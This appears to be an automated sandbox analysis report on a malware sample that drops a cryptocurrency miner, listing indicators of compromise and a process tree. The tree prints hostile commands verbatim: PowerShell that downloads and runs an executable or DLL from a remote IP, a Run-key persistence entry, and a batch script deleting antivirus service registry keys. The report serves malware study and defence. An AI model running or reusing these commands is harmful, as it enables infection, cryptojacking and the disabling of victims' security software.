a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e fsucenter.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
506962077b6d4f41f6879641bc8c8695.exepid process 1856 506962077b6d4f41f6879641bc8c8695.exe 1856 506962077b6d4f41f6879641bc8c8695.exe 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2724 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
506962077b6d4f41f6879641bc8c8695.exepid process 1856 506962077b6d4f41f6879641bc8c8695.exe 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 2724 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
D6BF.exepowershell.exeF151.exeWerFault.exeWerFault.exeWerFault.exeexplorer.exeWerFault.exedescription pid process Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeDebugPrivilege 3048 D6BF.exe Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 Token: SeDebugPrivilege 508 powershell.exe Token: SeDebugPrivilege 544 F151.exe Token: SeRestorePrivilege 3864 WerFault.exe Token: SeBackupPrivilege 3864 WerFault.exe Token: SeDebugPrivilege 3864 WerFault.exe Token: SeDebugPrivilege 384 WerFault.exe Token: SeDebugPrivilege 416 WerFault.exe Token: SeDebugPrivilege 2812 explorer.exe Token: SeDebugPrivilege 3196 WerFault.exe Token: SeShutdownPrivilege 2724 Token: SeCreatePagefilePrivilege 2724 -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
C8A5.tmppid process 2160 C8A5.tmp -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2724 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
506962077b6d4f41f6879641bc8c8695.exeC8A5.exeC8A5.tmpC8A5.exeexplorer.exeDB64.exeRuntimebroker.exedescription pid process target process PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe PID 652 wrote to memory of 1856 652 506962077b6d4f41f6879641bc8c8695.exe 506962077b6d4f41f6879641bc8c8695.exe PID 2724 wrote to memory of 1352 2724 C8A5.exe PID 2724 wrote to memory of 1352 2724 C8A5.exe PID 2724 wrote to memory of 1352 2724 C8A5.exe PID 1352 wrote to memory of 3676 1352 C8A5.exe C8A5.tmp PID 1352 wrote to memory of 3676 1352 C8A5.exe C8A5.tmp PID 1352 wrote to memory of 3676 1352 C8A5.exe C8A5.tmp PID 3676 wrote to memory of 4016 3676 C8A5.tmp C8A5.exe PID 3676 wrote to memory of 4016 3676 C8A5.tmp C8A5.exe PID 3676 wrote to memory of 4016 3676 C8A5.tmp C8A5.exe PID 4016 wrote to memory of 2160 4016 C8A5.exe C8A5.tmp PID 4016 wrote to memory of 2160 4016 C8A5.exe C8A5.tmp PID 4016 wrote to memory of 2160 4016 C8A5.exe C8A5.tmp PID 2724 wrote to memory of 3048 2724 D6BF.exe PID 2724 wrote to memory of 3048 2724 D6BF.exe PID 2724 wrote to memory of 3048 2724 D6BF.exe PID 2724 wrote to memory of 2848 2724 DB64.exe PID 2724 wrote to memory of 2848 2724 DB64.exe PID 2724 wrote to memory of 2848 2724 DB64.exe PID 2160 wrote to memory of 672 2160 explorer.exe fsucenter.exe PID 2160 wrote to memory of 672 2160 explorer.exe fsucenter.exe PID 2160 wrote to memory of 672 2160 explorer.exe fsucenter.exe PID 2848 wrote to memory of 2276 2848 DB64.exe Runtimebroker.exe PID 2848 wrote to memory of 2276 2848 DB64.exe Runtimebroker.exe PID 2848 wrote to memory of 2276 2848 DB64.exe Runtimebroker.exe PID 2724 wrote to memory of 424 2724 E4CB.exe PID 2724 wrote to memory of 424 2724 E4CB.exe PID 2724 wrote to memory of 424 2724 E4CB.exe PID 2724 wrote to memory of 996 2724 EEDE.exe PID 2724 wrote to memory of 996 2724 EEDE.exe PID 2724 wrote to memory of 996 2724 EEDE.exe PID 2724 wrote to memory of 1840 2724 F008.exe PID 2724 wrote to memory of 1840 2724 F008.exe PID 2724 wrote to memory of 1840 2724 F008.exe PID 2724 wrote to memory of 544 2724 F151.exe PID 2724 wrote to memory of 544 2724 F151.exe PID 2724 wrote to memory of 544 2724 F151.exe PID 2276 wrote to memory of 508 2276 Runtimebroker.exe powershell.exe PID 2276 wrote to memory of 508 2276 Runtimebroker.exe powershell.exe PID 2276 wrote to memory of 508 2276 Runtimebroker.exe powershell.exe PID 2724 wrote to memory of 1188 2724 explorer.exe PID 2724 wrote to memory of 1188 2724 explorer.exe PID 2724 wrote to memory of 1188 2724 explorer.exe PID 2724 wrote to memory of 1188 2724 explorer.exe PID 2724 wrote to memory of 1908 2724 explorer.exe PID 2724 wrote to memory of 1908 2724 explorer.exe PID 2724 wrote to memory of 1908 2724 explorer.exe PID 2724 wrote to memory of 2016 2724 explorer.exe PID 2724 wrote to memory of 2016 2724 explorer.exe PID 2724 wrote to memory of 2016 2724 explorer.exe PID 2724 wrote to memory of 2016 2724 explorer.exe PID 2724 wrote to memory of 204 2724 explorer.exe PID 2724 wrote to memory of 204 2724 explorer.exe PID 2724 wrote to memory of 204 2724 explorer.exe PID 2724 wrote to memory of 2160 2724 explorer.exe PID 2724 wrote to memory of 2160 2724 explorer.exe PID 2724 wrote to memory of 2160 2724 explorer.exe PID 2724 wrote to memory of 2160 2724 explorer.exe PID 2724 wrote to memory of 3356 2724 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe"C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe"C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\C8A5.exeC:\Users\Admin\AppData\Local\Temp\C8A5.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-E04SA.tmp\C8A5.tmp"C:\Users\Admin\AppData\Local\Temp\is-E04SA.tmp\C8A5.tmp" /SL5="$60050,4193427,831488,C:\Users\Admin\AppData\Local\Temp\C8A5.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C8A5.exe"C:\Users\Admin\AppData\Local\Temp\C8A5.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-0LF1Q.tmp\C8A5.tmp"C:\Users\Admin\AppData\Local\Temp\is-0LF1Q.tmp\C8A5.tmp" /SL5="$70050,4193427,831488,C:\Users\Admin\AppData\Local\Temp\C8A5.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nWOVzGuqQJ.bat"8⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵
-
C:\Windows\System32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:210⤵
-
C:\Windows\SysWOW64\mfvdsp\RuntimeBroker.exe"C:\Windows\System32\mfvdsp\RuntimeBroker.exe"9⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exeNULL6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\D6BF.exeC:\Users\Admin\AppData\Local\Temp\D6BF.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\DB64.exeC:\Users\Admin\AppData\Local\Temp\DB64.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add 